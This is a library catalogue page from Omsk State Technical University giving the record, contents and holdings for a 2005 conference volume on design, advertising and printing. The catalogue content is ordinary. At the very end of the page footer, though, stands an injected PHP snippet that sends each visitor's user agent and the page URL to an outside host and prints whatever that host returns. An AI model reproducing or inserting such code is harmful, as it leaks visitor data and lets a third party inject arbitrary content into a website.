Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

141 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=658.5/В42-728436")
Результаты поиска
E_OMSTU: Найдено записей: 1
1. 
658.5/В42-728436
658.5/В42
Визуальная культура: дизайн, реклама, полиграфия [Текст] : материалы IV междунар. науч. конф. / ОмГТУ ; ред. совет: Ю. С. Бернадская [и др.] ; дар. Л. М. Дмитриева. - Омск : Изд-во ОмГТУ, 2005. - 154 с. : рис., табл. - Библиогр. в конце ст. - 150 экз. - ISBN 5-8149-0278-7
Содержание:
Белов, Сергей Александрович. Углубленная гравюра. Сухая игла на органическом стекле / С. А. Белов. - С. 10-13
Кичигина, Анастасия Георгиевна. Мифологические сюжеты в современном искусстве Сибири / А. Г. Кичигина. - С. 27-31
Овчинникова, Раиса Юрьевна. "Рекламный дизайн" как социокультурный феномен / Р. Ю. Овчинникова. - С. 32-35
Османкина, Г. Ю. Взаимоотношение раннехристианской религии и искусства / Г. Ю. Османкина. - С. 35-40
Чирков, Владимир Федорович. Проблемы изучения местных культур в условиях глобализации / В. Ф. Чирков. - С. 45-47
Чуйко, Л. В. Солярный знак в резервных украшениях деревянной архитектуры Омска и Тары / Л. В. Чуйко. - С. 47-49
Бублова, Наталья Петровна. Теоретические основы профессиональной подготовки будущих специалистов по рекламе в процессе обучения компьютерной графике / Н. П. Бублова. - С. 53-57
Дмитриева, Лариса Михайловна. К вопросу о подготовке конкурентоспособных специалистов по рекламе / Л. М. Дмитриева, Ю. С. Бернадская. - С. 63-68
Ломова, Ольга Станиславовна. Коммуникативное воздействие на рекламную деятельность / О. С. Ломова. - С. 69-75
Макарова, Т. В. Дистанционные технологии в подготовке специалистов высшей квалификации / Т. В. Макарова. - С. 75-80
Мамыкина, О. Н. Особенности и этапы разработки рекламно-информационного сайта для высшего учебного заведения (на примере ОмГТУ) / О. Н. Мамыкина. - С. 80-85
Марочкина, Светлана Станиславовна. Лояльность к брэнду / С. С. Марочкина. - С. 85-89
Марочкина, Светлана Станиславовна. Формирование тарифов на электрическую энергию: зарубежный опыт / С. С. Марочкина. - С. 89-93
Ракитина, Л. С. Свойства полярности символа как один из приемов создания эффективной рекламы / Л. С. Ракитина. - С. 93-96
Смотрова, Людмила Федоровна. Реклама и уровень жизни населения / Л. Ф. Смотрова. - С. 96-99
Ткаченко, Наталья Владимировна. Креативная стратегия разработки рекламной идеи / Н. В. Ткаченко. - С. 105-109
Андреев, Рудольф Петрович. Изготовление клише для тампонной печати на основе сухих пленочных фоторезистов / Р. П. Андреев. - С. 109-112
Андреев, Рудольф Петрович. Исследование возможности использования эпоксидной смолы ЭД-20 для объемной заливки рекламно-сувенирной продукции / Р. П. Андреев. - С. 112-116
Варепо, Лариса Григорьевна. Исследование красковосприятия мелованных бумаг / Л. Г. Варепо, К. В. Фаренбрух, А. С. Борисова. - С. 122-127
Ганиева, Надежда Михайловна. Идеальное решение для наращивания производственной мощности / Н. М. Ганиева. - С. 127-130
Гладкова, Е. И. Обзор современных методов растрирования полутоновых изображений / Е. И. Гладкова. - С. 130-132
Колбина, Елена Леонидовна. Исследование деформационных свойств многослойных полимерных материалов / Е. Л. Колбина, А. Иванов. - С. 133-139
Литунов, Сергей Николаевич. Анализ факторов, влияющих на развитие трафаретных печатных устройств / С. Н. Литунов. - С. 139-144

УДК
658.512.23
655
ББК
76.006.5л0

Рубрики:
Дизайн -- Конференции -- ОмГТУ
Полиграфия -- Конференции -- ОмГТУ
Реклама -- Конференции -- ОмГТУ

Кл.слова (ненормированные): УГЛУБЛЕННАЯ -- ГРАВЮРА -- УПАКОВКА -- ЦВЕТОВОСПРИЯТИЕ -- ХРАМ -- РОСПИСЬ -- ШРИФТ -- ДЕРЕВЯННАЯ -- АРХИТЕКТУРА -- СОЛЯРНЫЙ -- ЗНАК -- ТЕЛЕВИЗИОННАЯ -- ДИСТАНЦИОННАЯ -- ТЕХНОЛОГИЯ -- БРЭНД -- КРЕАТИВ -- КЛИШЕ -- ТАМПОННАЯ -- ПЕЧАТЬ -- ЭПОКСИДНАЯ -- СМОЛА -- РАСТРИРОВАНИЕ -- ПОЛУТОНОВЫЕ -- ИЗОБРАЖЕНИЕ
Доп. точки доступа:
Бернадская, Юлия Сергеевнаред.
Колбина, Елена Леонидовнаред.
Пендикова, Ирина Геннадьевнаред.
Литунов, Сергей Николаевичред.
Сысоев, И. А.ред.
Дмитриева, Лариса Михайловнадар.
Омский государственный технический университет
Экз-ры полностью 658.5/В42-728436
Имеются экземпляры в отделах:
ОНЛ (14.04.2006г. Инв.555491 - 40.00 р.) - свободен
ДЕП (14.04.2006г. Инв.555490 - 40.00 р.) - свободен
Оглавление 
  • Белов, Сергей Александрович. Углубленная гравюра. Сухая игла на органическом стекле / С. А. Белов. - 4.10-13
  • Кичигина, Анастасия Георгиевна. Мифологические сюжеты в современном искусстве Сибири / А. Г. Кичигина. - 4.27-31
  • Овчинникова, Раиса Юрьевна. "Рекламный дизайн" как социокультурный феномен / Р. Ю. Овчинникова. - 4.32-35
  • Османкина, Г. Ю. Взаимоотношение раннехристианской религии и искусства / Г. Ю. Османкина. - 4.35-40
  • Чирков, Владимир Федорович. Проблемы изучения местных культур в условиях глобализации / В. Ф. Чирков. - 4.45-47
  • Чуйко, Л. В. Солярный знак в резервных украшениях деревянной архитектуры Омска и Тары / Л. В. Чуйко. - 4.47-49
  • Бублова, Наталья Петровна. Теоретические основы профессиональной подготовки будущих специалистов по рекламе в процессе обучения компьютерной графике / Н. П. Бублова. - 4.53-57
  • Дмитриева, Лариса Михайловна. К вопросу о подготовке конкурентоспособных специалистов по рекламе / Л. М. Дмитриева, Ю. С. Бернадская. - 4.63-68
  • Ломова, Ольга Станиславовна. Коммуникативное воздействие на рекламную деятельность / О. С. Ломова. - 4.69-75
  • Макарова, Т. В. Дистанционные технологии в подготовке специалистов высшей квалификации / Т. В. Макарова. - 4.75-80
  • Мамыкина, О. Н. Особенности и этапы разработки рекламно-информационного сайта для высшего учебного заведения (на примере ОмГТУ) / О. Н. Мамыкина. - 4.80-85
  • Марочкина, Светлана Станиславовна. Лояльность к брэнду / С. С. Марочкина. - 4.85-89
  • Марочкина, Светлана Станиславовна. Формирование тарифов на электрическую энергию: зарубежный опыт / С. С. Марочкина. - 4.89-93
  • Ракитина, Л. С. Свойства полярности символа как один из приемов создания эффективной рекламы / Л. С. Ракитина. - 4.93-96
  • Смотрова, Людмила Федоровна. Реклама и уровень жизни населения / Л. Ф. Смотрова. - 4.96-99
  • Ткаченко, Наталья Владимировна. Креативная стратегия разработки рекламной идеи / Н. В. Ткаченко. - 4.105-109
  • Андреев, Рудольф Петрович. Изготовление клише для тампонной печати на основе сухих пленочных фоторезистов / Р. П. Андреев. - 4.109-112
  • Андреев, Рудольф Петрович. Исследование возможности использования эпоксидной смолы ЭД-20 для объемной заливки рекламно-сувенирной продукции / Р. П. Андреев. - 4.112-116
  • Варепо, Лариса Григорьевна. Исследование красковосприятия мелованных бумаг / Л. Г. Варепо, К. В. Фаренбрух, А. С. Борисова. - 4.122-127
  • Ганиева, Надежда Михайловна. Идеальное решение для наращивания производственной мощности / Н. М. Ганиева. - 4.127-130
  • Гладкова, Е. И. Обзор современных методов растрирования полутоновых изображений / Е. И. Гладкова. - 4.130-132
  • Колбина, Елена Леонидовна. Исследование деформационных свойств многослойных полимерных материалов / Е. Л. Колбина, А. Иванов. - 4.133-139
  • Литунов, Сергей Николаевич. Анализ факторов, влияющих на развитие трафаретных печатных устройств / С. Н. Литунов. - 4.139-144
Экземпляры 
    Место храненияЭкземпляров
    ВсегоСвободно
    ОНЛ11
    ДЕП11
Полный текст
вернуться


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2996 - 23.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.70 с.8 запросов, 0.34c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;